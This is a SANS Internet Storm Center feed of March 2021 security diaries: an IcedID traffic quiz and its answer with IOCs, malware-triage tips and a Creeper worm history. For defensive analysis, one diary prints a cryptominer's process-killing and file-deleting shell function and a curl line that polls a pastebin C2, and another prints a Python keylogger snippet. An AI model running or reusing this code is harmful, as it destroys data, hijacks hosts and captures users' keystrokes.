SANS

Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 1 óra 51 perc
2021. március 24.

ISC Stormcast For Wednesday, March 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7426, (Wed, Mar 24th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 24.

Analysis from March 2021 Traffic Analysis Quiz, (Wed, Mar 24th)

Introduction

Yesterday's diary provided a packet capture (pcap) of approximately 20 and 1/2 hours of traffic from an infected Windows host, which included the initial infection.  It also provided malware and artifacts recovered from the infected computer.  That was presented as a traffic analysis quiz, and today's diary provides analysis of the activity.

This infection was from the recently updated version of IcedID (Bokbot) we started seeing in March 2021.  These types of infection are usually caused by malicious macros dressed in a Microsoft Office document like an Excel or Word file, such as this example from Friday 2021-03-19.


Shown above:  These documents are often as convincing as Spiderman is here.

Incident Report

Executive Summary:

On Tuesday 2021-03-16 at approximately 19:03 UTC, a Windows computer used by Maynard Constantino was infected With IcedID (Bokbot) malware.

Victim Details:

  • IP address: 172.16.4.213
  • MAC address: 34:64:a9:0e:b6:15
  • Host name: DESKTOP-BZQ15T8
  • User account name: maynard.constantino

Indicators of Compromise (IOCs):

Infection traffic:

  • 188.127.235[.]244 port 80 - 188.127.235[.]244 - GET /44271.7938611111.dat
  • 185.82.217[.]213 port 80 - 185.82.217[.]213 - GET /44271.7938611111.dat
  • port 443 (HTTPS traffic) - aws.amazon.com - GET /   (not inherently malicious)
  • 178.128.243.14 port 80 - 630mordorebiter[.]website - GET /
  • 165.227.28[.]47 port 443 - iporumuski[.]fun - HTTPS traffic
  • 165.227.28[.]47 port 443 - agitopinaholop[.]uno - HTTPS traffic
  • 165.227.28[.]47 port 443 - dedupomoshi[.]space - HTTPS traffic
  • 178.128.156[.]142 port 443 - mazaksaedr23[.]space - HTTPS traffic
  • 178.128.156[.]142 port 443 - kledoapkd[.]website - HTTPS traffic
  • 178.128.156[.]142 port 443 - lapoedjkeo[.]top - HTTPS traffic
  • 178.128.156[.]142 port 443 - kawepotriv[.]space - HTTPS traffic

List of files recovered from the infected user's home directory:

  • Kiod.hod
  • Kiod.hod2
  • AppData/Local/{10D90F27-F2E2-6218-7102-7745CA868DA0}/Embiteci.dll
  • AppData/Local/Temp/warfare_32.tmp
  • AppData/Roaming/CoverReplace/license.dat

Scheduled task recovered from infected Windows host:

rundll32.exe "C:\Users\maynard.constantino\AppData\Local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll",update /i:"CoverReplace\license.dat"

Details on files extracted from the pcap:

SHA256 hash: 4f667f4267b2a1e90029ec3e66de84f0131e573087d4a0f50e4c9b5b9e0a8173

  • File size: 44,544 bytes
  • File location: hxxp://188.127.235[.]244/44271.7938611111.dat
  • File location: hxxp://185.82.217[.]213/44271.7938611111.dat
  • File location: C:\Users\maynard.constantino\Kiod.hod
  • File location: C:\Users\maynard.constantino\Kiod.hod2
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

SHA256 hash: 91cf231431ef2cc4defc4f1ad3d149c665acc317c4a89e0188f32df259b63cef

  • File size: 377,579 bytes
  • File location: hxxp://630mordorebiter[.]website
  • File type:  gzip compressed data, was "update_2533051401.msi", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1397480
  • Note: This is an encrypted binary masquerading as a gzip file. It's not malicious on its own.

Details on files recovered from the infected Windows host:

SHA256 hash: 523bbb839a8c0524c0f372680e6abad3b9158fafa68865381fbd1380b7b934b9

  • File size: 36,352 bytes
  • File location: File location: C:\Users\maynard.constantino\AppData\local\Temp\warfare_32.tmp
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
  • Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat

SHA256 hash: 47d084aab92ee591fe180613fda9ffd132b15db9b09be41ab046260cda311dc0

  • File size: 36,352 bytes
  • File location: C:\Users\maynard.constantino\AppData\local\{10D90F27-F2E2-6218-7102-7745CA868DA0}\Embiteci.dll
  • File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
  • Run method: rundll32.exe [filename],update /i:"CoverReplace\license.dat

SHA256 hash: 45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865

  • File size: 341,002 bytes
  • File location: C:\Users\maynard.constantino\AppData\Roaming\CoverReplace\license.dat
  • File type: data
  • Note: This data binary is used by the above two DLL files

Analysis

The image below shows traffic from the pcap filtered in Wireshark to focus on the initial infection and C2 traffic.


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 2).

Of note, several hours after the infection, we started seeing  different domains and IP addresses for the IcedID command and control (C2) traffic as shown below.


Shown above:  C2 domains and IP address for the IcedID infection change near the end of the pcap.

Using WIreshark's Export HTTP Objects function, you can export the initial malware DLL and the fake gzip file used for IcedID's new "gziploader" technique to infect the host.  There are two copies of each file in the pcap.  See the image below for details.


Shown above:  Exporting initial DLL and fake gzip file from the pcap.

Perhaps the most easily identifiable characteristic of recent IcedID infections is the license.dat file referenced in the scheduled task.  This binary data file is used by the initial and persistent IcedID DLL to infect and keep the infection persistent.


Shown above:  Action from the scheduled task, where rundll32.exe uses license.dat when running the persistent IcedID DLL.

Final Words

This "gziploader" technique used by IcedID is fairly new, so some people in the infosec community might not be fully aware of it yet.  However, post-infection activity remains noticeably similar to what we've seen with IcedID malware in the past few months before the update.

A zip archive with a pcap of the infection traffic is available in this Github repository, which also contains malware and artifacts from the infected computer.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 23.

The 2021 SANS Security Awareness Report is out. Learn data-driven lessons learned how organizations around the world are effectively managing their human risk https://www.sans.org/security-awareness-training/sareport-2021, (Tue, Mar 23rd)

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 23.

ISC Stormcast For Tuesday, March 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7424, (Tue, Mar 23rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 23.

March 2021 Traffic Analysis Quiz, (Tue, Mar 23rd)

Introduction

Today's diary is a new traffic analysis quiz.  For this quiz, I ask participants to write an incident report that identifies the affected Windows host and user account.

If possible, try to identify the malware family associated with this infection.  But there are many different types of malware, and they're constantly evolving and multiplying, so don't worry if you don't recognize the malware family.


Shown above:  So much malware out there.

The packet capture (pcap) for today's traffic analysis quiz is contained in a zip archive hosted at this Github repository.  The repository also contains another zip archive with malware and artifacts recovered from the infected Windows host.  Be very careful with the malware and artifacts zip.  If you don't know what you're doing, do not download the malware and artifacts.  I also recommend participants do this exercise in a non-Windows environment, if possible.

Unlike my previous traffic analysis quizzes, this quiz does not include any alerts on the network traffic.


Shown above:  Pcap for this traffic analysis quiz opened in Wireshark.

Requirements

This type of analysis requires Wireshark.  Wireshark is my tool of choice to review pcaps of infection traffic.  However, default settings for Wireshark are not optimized for web-based malware traffic.  That's why I encourage people to customize Wireshark after installing it.  To help, I've written a series of tutorials.  The ones most helpful for this quiz are:

I always recommend participants use a non-Windows environment like BSD, Linux, or macOS.  Why?  Because most pcaps in these traffic analysis quizzes contain traffic with Windows-based malware.  If you're using a Windows host to review such pcaps, your antivirus (or Windows Defender) may delete or alter the pcap.  Worst case?  If you extract malware from a pcap and accidentally run it, you might infect your Windows computer.

In this case, I've also included a zip archive that contains malware and artifacts retrieved from the infected Windows host.  Unless you are a skilled malware analyst, you should avoid examining the contents of that particular zip archive on a Windows computer, because it's Windows-based malware.

Active Directory (AD) Environment

The infected Windows host is part of an AD environment, so the pcap contains information about the Windows user account. The user account is formatted as firstname.lastname.  The AD environment characteristics are:

  • LAN segment range: 172.16.4.0/24 (172.16.4.0 through 172.16.4.255)
  • Domain: baritonetv.com
  • Domain Controller: 172.16.4.4 - BaritoneTV-DC
  • LAN segment gateway: 172.16.4.1
  • LAN segment broadcast address: 172.16.4.255

Final Words

Again, the zip archive with a pcap of the traffic for this exercise is available in this Github repository.  Analysis of this infection will be posted in tomorrow's ISC diary.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 22.

Nim Strings, (Mon, Mar 22nd)

On Tuesday's Stormcast, Johannes talked about malware written in the Nim Programming language.

Internally, strings in the Nim programming language are stored inside a structure (STRING_LITERAL) that consists of 2 integers followed by the string.

Both integers represent the length of the string, although the second integer has one bit set to indicate it is a string literal.

Here is an example of a program I wrote and compiled to a 32-bit PE file:

In red is the string itself (17 bytes long, 0x11). Green is the first integer: the length of the string (0x00000011) encoded as a little-endian 32-bit integer (0x11000000). Yellow is the second integer: the length of the string encoded as a little-endian 32-bit integer with the 3rd most-significant bit set (0x00000011 + x40000000 -> 0x11000040).

I wrote a Python script to extract these strings. It's beta: I still have to decided if and how to integrate this in my strings.py tool).

Unlike the classic tool strings, this tool will also extract strings that contain non-printable characters.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 22.

ISC Stormcast For Monday, March 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7422, (Mon, Mar 22nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 21.

Video: Finding Metasploit & Cobalt Strike URLs, (Sun, Mar 21st)

I have a couple of questions on my diary entry "Finding Metasploit & Cobalt Strike URLs", thus I made a video that shows the method and explains in detail the checksum calculation.

I don't use this method to go hunting (in proxy logs for example), as the checksum has a low-entropy, thus prone to collisions/false positives. But I do use this when I suspect the presence of Metasploit or Cobalt Strike traffic.

Cobalt Strike beacons often use HTTPS, but the URLs I talked about in my diary entry, are not the ones used by the beacon itself. These are the URLs of the staging shellcode, that precedes the beacon.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 20.

YARA Pre-release v4.1.0, (Sat, Mar 20th)

There's a new version of YARA on GitHub, a pre-release for version 4.1.0.

We can expect the actual version 4.1.0 soon.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 19.

Pastebin.com Used As a Simple C2 Channel, (Fri, Mar 19th)

With the growing threat of ransomware attacks, they are other malicious activities that have less attention today but they remain active. Think about crypto-miners. Yes, attackers continue to mine Monero on compromised systems. I spotted an interesting shell script that installs and runs a crypto-miner (SHA256:00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2[1]).

The script looks to be a classic one but there are some interesting behaviours that I'd like to share.

Such scripts, before launching the miner, are trying to get rid of previously installed concurrent tools. I already covered this in a previous diary[2] but how do they behave today? The script implements a function kills() that searches for existing miners and kills them. But it goes one step further: It also checks for established connections to specific ports or IP addresses!

function kills() { pkill -f sourplum pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/*index_bak* rm -rf /tmp/*httpd.conf* rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 ps auxf|grep -v grep|grep "mine[.]moneropool[.]com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash[.]com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr[.]crypto-pool[.]fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum[.]f2pool[.]com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9 pkill -f biosetjenkins pkill -f AnXqV.yam pkill -f xmrigDaemon pkill -f xmrigMiner pkill -f xmrig pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f bashx pkill -f bashg pkill -f bashe pkill -f bashf pkill -f bashh pkill -f XbashY pkill -f libapache pkill -f qW3xT.2 pkill -f /usr/bin/.sshd pkill -f sustes pkill -f Xbash rm -rf /var/tmp/j* rm -rf /tmp/j* rm -rf /var/tmp/java rm -rf /tmp/java rm -rf /var/tmp/java2 rm -rf /tmp/java2 rm -rf /var/tmp/java* rm -rf /tmp/java* rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json /var/tmp/kworkerds /var/tmp/config.json /usr/local/lib/libjdk.so rm -rf /tmp/.systemd-private-* chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3 chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate rm -rf /etc/rc.d/rc*.d/S01nfstruncate /bin/nfstruncate netstat -anp | grep 69[.]28[.]55[.]86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 185[.]71[.]65[.]238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep 140[.]82[.]52[.]87 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 p=$(ps auxf|grep -v grep|grep kworkerds|wc -l) if [ ${p} -eq 0 ];then netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 ps auxf|grep -v grep | awk '{if($3>=90.0) print $2}'| xargs kill -9 fi }

This function is a perfect candidate to be rewritten from a defender's point of view and used to detect a potential miner running on your computers!

The second interesting point is the use of pastebin.com not only to download malicious payloads but also as a very simple C2 communication channel. Do you know that, when you create a pastie, you can edit it later:

The script (executed from a corn job), grabs the content of a pastie and, base on the content, behaves in different ways:

update=$( curl -fsSL --connect-timeout 120 hxxps://pastebin[.]com/raw/SSCy7mY7 ) if [ ${update}x = "update"x ];then echocron else ...

The current pastie content:

remnux@remnux:/MalwareZoo/20210319$ curl hxxps://pastebin[.]com/raw/SSCy7mY7 noupdate

Simple but effective!

[1] https://www.virustotal.com/gui/file/00e2ddca696426d9cad992662284d1f28b9ecd44ed7c1be39789417c1ea9a5f2/detection
[2] https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 19.

ISC Stormcast For Friday, March 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7420, (Fri, Mar 19th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 18.

Simple Python Keylogger , (Thu, Mar 18th)

A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if it's a juicy one or not. 

To follow up on my yesterday diary[1], Microsoft Windows provides API calls to implement a keylogger via API calls like GetKeyState() and GetAsyncKeyState() help to determine if a particular key is pressed[2]. But, can attackers implement a keylogger in other languages?

In 2019, I wrote a diary about a keylogger in PowerShell[3]. Seeing that Python becomes more and more popular in the Windows eco-system, I searched for some samples. I found one that was published as a PoC[4] already six years ago(!) but still used in the wild today. It was again submitted to VT a few weeks ago (SHA256:fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41[5]) and has still a very nice score (only 3/59).

The implementation is Python is extremely easy thanks to the pyHook module:

import pyHook, pythoncom data='' def GetKeyPressedAndSendIt(event): global data if event.Ascii==13: keys='<ENTER>' elif event.Ascii==8: keys='<BACK SPACE>' elif event.Ascii==9: keys='<TAB>' else: keys=chr(event.Ascii) data=data+keys hm = pyHook.HookManager() hm.KeyDown = GetKeyPressedAndSendIt hm.HookKeyboard() pythoncom.PumpMessages(

I performed a quick retro hunt on VT to search for the same kind of script and found only 9 occurences:

Hash Type Score Upload Time ebb80bf4d9768ed7ee9ade739304453ac3474bfdbf06d8a414563aa1bf19592f PE 3/68 2021-02-21 02:51:42 UTC 675757ca9bc6b3be10913e5a4ee43bea371ad8f826c5a25d4c0e38e90bfb1f25 PE 2/70 2021-02-17 04:48:20 UTC 79b53c72eeb936161ed8069da5e6ccddd42cc993b90ac67fb5262abc194e8797 Script 1/59 2021-02-15 11:43:15 UTC a518235828977df57f0c3442390729affce92ed4613f8fb3cdda48f06d8712b9 Script 0/59 2021-02-02 02:07:36 UTC cd8e126b6305cd97486877bbe1db8e3dfe2653a63d451484399f12ebff339ed3 Script 12/58 2021-02-08 22:35:34 UTC f3d38383b0bf68204bd755ce80110915858b48c860bc7b76d91ec1c7dcb07058 Script 10/58 2021-01-22 22:22:23 UTC 395d51c3fdb2f8281cf0a9d9815f256d5f50d6eddd20d36d9eb33938be921d97 PE 13/70 2021-01-17 06:30:19 UTC 9866864b511576fe2421b469d163d8d942c29a7651c5f7f505750c70734b1183 Script 0/56 2021-01-15 14:44:05 UTC 365b45370d4db7600195c126d700de6e31d4d4084d14ff8e12a4371d84c89c85 Script 1/60 2020-12-21 00:34:00 UTC

As you can see, the peak of submitted samples occurred between mid-January and mid-February.

[1] https://isc.sans.edu/forums/diary/Defenders+Know+Your+Operating+System+Like+Attackers+Do/27212/
[2] https://gist.github.com/aktau/11057438
[3] https://isc.sans.edu/forums/diary/Simple+Powershell+Keyloggers+are+Back/24676
[4] https://github.com/HacKeD0x90/PythonKeyLogger
[5] https://www.virustotal.com/gui/file/fe057c31951304a59ff6a59f58e49373c736e75305dcd0c53391d310337ccb41/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 18.

ISC Stormcast For Thursday, March 18th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7418, (Thu, Mar 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 17.

Defenders, Know Your Operating System Like Attackers Do&#x21;, (Wed, Mar 17th)

Not a technical diary today but more a reflection… When I’m teaching FOR610[1], I always remind students to “RTFM” or "Read the F… Manual". I mean to not hesitate to have a look at the Microsoft document when they meet an API call for the first time or if they are not sure about the expected parameters.

Many attackers have a very deep knowledge of how targeted operating systems are behaving and what are the controls in place or features that could be (ab)used by malicious code. When you’re analyzing malware samples, it’s very important to quickly spot interesting blocks of code (by learning which interesting OS feature they use). A classic example is the API call VirtualAllocEx()[2] which allocates a region of memory within the virtual address space of a specified process:

LPVOID VirtualAllocEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

hProcess is a handle to a process returned by OpenProcess(). Then, you use WriteProcessMemory() to write specified contents into the memory of the targeted process. When you read this, you can ask yourself: “Wait… why does Microsoft allow a process to inject code into another process?”. The answer is simple: because it’s a key feature of the operating system and it can be used for many totally legit reasons. Think about antivirus programs! It’s common that AV injects code into processes of a process (ex: in browsers to inspect downloaded data).

API calls are a key aspect of malware, not only the function itself but also its options. Here is another example: If you see a VirtualProtect, check the last parameter:

LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );

flProtect allows you to set the memory protection for the region of pages to be allocated. If you see the value 0x40 (PAGE_EXECUTE_READWRITE) set for this parameter, it means the newly allocated memory will contain executable code![3]

An approach to flag some sample during the triage process is to identify the group of API’s that are used to perform suspicious actions like:

  • Code injection
  • DLL operations
  • Dropping 2nd stage

In my triage process, I use FLOSS[4] because it can extract a lot of API calls from strings, stack strings, etc… Then I parse the output to YARA to match interesting groups of API. Example:

remnux@remnux:/MalwareZoo/20210316$ floss sample.exe | ./yarawrapper.py suspicious-api-calls.yara Matching: api_address_search Matching: dll_operations

Why YARA? Because it helps to create useful rules like "any of this", "all of this", and, or, groups of APIs. A sample of YARA rules is available here[5].

Happy hunting!

[1] http://for610.com
[2] https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
[3] https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants
[4] https://github.com/fireeye/flare-floss
[5] https://github.com/xme/yara-rules/blob/main/suspicious-api-calls.yara

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 17.

ISC Stormcast For Wednesday, March 17th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7416, (Wed, Mar 17th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 16.

50 years of malware&#x3f; Not really. 50 years of computer worms&#x3f; That's a different story..., (Tue, Mar 16th)

If you have any interest in the history of malicious code, chances are you’ve heard or read somewhere that the first piece of malware ever created was a computer worm called Creeper and that spread itself through the ARPANET in 1971. Some sources even mention that it might have been on this very date, i.e. exactly 50 years ago[1].

So does malware really turn 50 today?

Not likely. Even leaving aside that according to some sources[2], there may have been a fork bomb[3] program created all the way back in 1969, and therefore the oldest malware might already be over 50 years old, the simple fact is that Creeper wasn’t malware in any sense of the word... Alhough it was probably the first example of a (benign) computer worm ever created.

In the multiple retellings of its legend that may be found both online and in print, we have, however, a prime example of something which is unfortunately relatively common (not just) in infosec. That is repeating of interesting-looking information without checking for any original sources, which might provide context to it. I don’t mind admitting that this is a pet peeve of mine[4] and so I thought that on this day, which may or may not mark the 50th anniversary of the original “run” of Creeper, it might be a good idea to take a look at what we really know about it.

According to the few trustworthy articles on the subject, which cite their sources[5,6], and explanations provided by Ray Tomlinson, who played a significant part in the story of Creeper[7,8], the program was created at BBN technologies at some point in 1971. At that time, BBN was developing the TENEX an operating system for the PDP-10 computer. One of the developers of TENEX was Robert Thomas, who, among other projects, worked on what was called a Resource Sharing Executive, or RSEXEC – an experiment with what was thought of as a “mobile application” concept. RSEXEC was basically supposed to enable a program to “jump” between computers in order for it to always be executed by a machine with unutilized computational resources or with data, which the program needed. As you’ve probably guessed, Creeper was the demonstration program, which resulted from Thomas’s work.

The original application was tested using (at most) 28 computers connected to the ARPANET and running the TENEX OS. Creeper migrated from one system to another, always "removing" itself from the machine, when it was leaving it. What is important to note is that this was done with full agreement and cooperation of operators of all those computers and that the test had no negative effects on them.
All that the Creeper supposedly did on “visited” computers was printing the famous message “I’M THE CREEPER : CATCH ME IF YOU CAN” on a teletype.


Message printed by Creeper[5]

An indeterminate amount of time later, Ray Tomlinson, who worked at BBN Technologies at the same time as Bob Thomas, created a modified version Creeper. The program originally jumped from one machine to another, which meant that there was always only one copy of it on the entire network (computer worms which behave in this way are sometimes called “rabbits”). The new version, which was created by Tomlinson, had the ability to replicate itself, i.e. create multiple copies of itself, which might exist at the same time on different machines (meaning it behaved more like a usual computer worm). This updated version was - once again - not malicious in any way and one may think of it as a demonstration of the concept of distributed computation more than anything else.

Since it was able to replicate itself and it was necessary to make sure it didn’t cause any problems even in case of bugs which might make it hang, Tomlinson also created a program called Reaper. This was a simple piece of code, which visited each of the approximately 28 computers, which might have hosted Creeper, and terminated any instances of Creeper it found running on them.

Due to this behavior, Reaper is sometimes called “the first anti-virus”[9]. Since neither version of Creeper was malicious in any way, depending on your definition of "anti-virus" this title may or may not be applicable. Reaper however almost certainly may be called the first “nematode” (a worm or virus, which removes another worm or virus from a system, on which it is present).

So, based on the history ve'we recounted, what may we say with any sort of certainty regarding the age of malware? Not much. In terms of the age of computer worms, however, chances are good that they really are really turning 50 this year, whether it is today or not. It is a little bit sad that one tends to think of every computer worm as being malicious “by default”, since, as this little trip down the memory lane shows us, it doesn’t necessarily have to be true...

In any case, if you’d like to learn a bit more about the origins of modern malware (and don’t mind low-quality video editing), the following video might be worth your time.

[1] https://www.cybersecurity-insiders.com/a-brief-history-of-cybersecurity/
[2] http://catb.org/~esr/jargon/html/W/wabbit.html
[3] https://en.wikipedia.org/wiki/Fork_bomb
[4] https://untrustednetwork.net/en/2019/10/19/do-automated-tools-really-detect-only-45-of-all-vulnerabilities/
[5] https://corewar.co.uk/creeper.htm
[6] http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.137.9511&rep=rep1&type=pdf
[7] https://history-computer.com/the-first-computer-virus-of-bob-thomas-complete-history/
[8] https://nerdology.org/2014/11/qa-with-ray-tomlinson-on-creeper/
[9] https://en.wikipedia.org/wiki/Reaper_(program)

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 16.

ISC Stormcast For Tuesday, March 16th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7414, (Tue, Mar 16th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 15.

Finding Metasploit &#x26; Cobalt Strike URLs, (Mon, Mar 15th)

Metasploit and Cobalt Strike generate shellcode for http(s) shells. The URLs found in this shellcode have a path that consist of 4 random alphanumeric characters. But they are not completely random: their 8-bit checksum is a member of a small set of constants.

The 8-bit checksum is the sum of the ASCII value of the 4 characters of the path. Take the least significant byte of the sum, and compare it with this table:

If the checksum is equal to one of these values, the URL could be generated by Metasploit or Cobalt Strike.

I illustrate this with Brad's capture file of Qakbot & Cobalt Strike traffic and my tool metatool.py.

Wireshark's command-line tool tshark is what I used to produce a complete packet tree for each packet. The URLs we are looking for will be somewhere in this output:

And then I pipe this output into my metatool.py with command url8:

